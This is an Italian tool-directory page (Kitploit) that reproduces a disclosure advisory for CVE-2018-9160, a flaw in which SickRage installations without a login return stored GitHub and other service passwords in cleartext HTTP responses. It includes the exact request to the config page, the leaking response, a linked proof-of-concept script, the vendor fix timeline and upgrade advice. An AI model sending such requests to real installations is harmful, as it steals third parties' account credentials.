Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
sickrageWTF — CVE-2018-9160 | Kitploit
Strumenti/GitHubGitHub/mechanico/sickragewtf
Attacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration Testing
GitHubmechanico/sickragewtf

sickrageWTF

CVE-2018-9160

Vedi Repository
28 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Credenziali GitHub in chiaro di Sickrage CVE-2018-9160


  1. Informazioni

Titolo dell'exploit: Credenziali in chiaro di SickRage nella risposta HTTP
Data: 2018-04-01
Autore dell'exploit: Sven Fassbender
Contatto: https://twitter.com/mezdanak
Homepage del fornitore: https://sickrage.github.io
Link del software: https://github.com/SickRage/SickRage
Versione: < v2018.03.09-1
CVE : CVE-2018-9160
Categoria: webapps


  1. Informazioni di base

"SickRage è un gestore automatico di librerie video per serie TV.
Osserva i nuovi episodi dei tuoi programmi preferiti e, quando vengono pubblicati, compie la sua magia:
ricerca automatica di torrent/nzb, download ed elaborazione alle qualità che desideri." --estratto da https://sickrage.github.io


  1. Descrizione della vulnerabilità

SickRage restituisce credenziali in chiaro, ad es. GitHub, AniDB, Kodi, Plex ecc., nelle risposte HTTP.
Il prerequisito è che l'utente non abbia impostato un nome utente e una password per la propria installazione di SickRage. (non obbligatorio, di default)

Richiesta HTTP:

root@kitploit:~
GET /config/general/ HTTP/1.1  
Host: 192.168.1.13:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: de,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer: http://192.168.1.13:8081/config/backuprestore/  
DNT: 1  
Connection: close  
Upgrade-Insecure-Requests: 1  

Risposta HTTP:

root@kitploit:~
HTTP/1.1 200 OK  
Content-Length: 113397  
Vary: Accept-Encoding  
Server: TornadoServer/4.5.1  
Etag: "e5c29fe99abcd01731bec1afec0e618195f1ae37"  
Date: Fri, 02 Mar 2018 10:47:51 GMT  
Content-Type: text/html; charset=UTF-8  

<!DOCTYPE html>  
<html lang="nl_NL">  
    <head>  
		[...]  
        <input type="text" name="git_username" id="git_username" value="[email protected]" class="form-control input-sm input300" autocapitalize="off" autocomplete="no" />  
        [...]  
        <input type="password" name="git_password" id="git_password" value="supersecretpassword" class="form-control input-sm input300" autocomplete="no" autocapitalize="off" />  
		[...]  
        </div>  
    </body>  
</html>  

  1. Prova di concetto

https://github.com/mechanico/sickrageWTF/blob/master/get_github_creds_sickrage.py


  1. Cronologia

[2018-03-07] Vulnerabilità scoperta
[2018-03-08] Fornitore contattato
[2018-03-08] Il fornitore ha risposto
[2018-03-09] Vulnerabilità corretta. (https://github.com/SickRage/SickRage/compare/v2018.02.26-2...v2018.03.09-1)


  1. Raccomandazione

Aggiornare l'installazione di SickRage alla versione v2018.03.09-1 o successiva.
Proteggere l'accesso all'applicazione web con credenziali utente adeguate.


Scarica lo strumento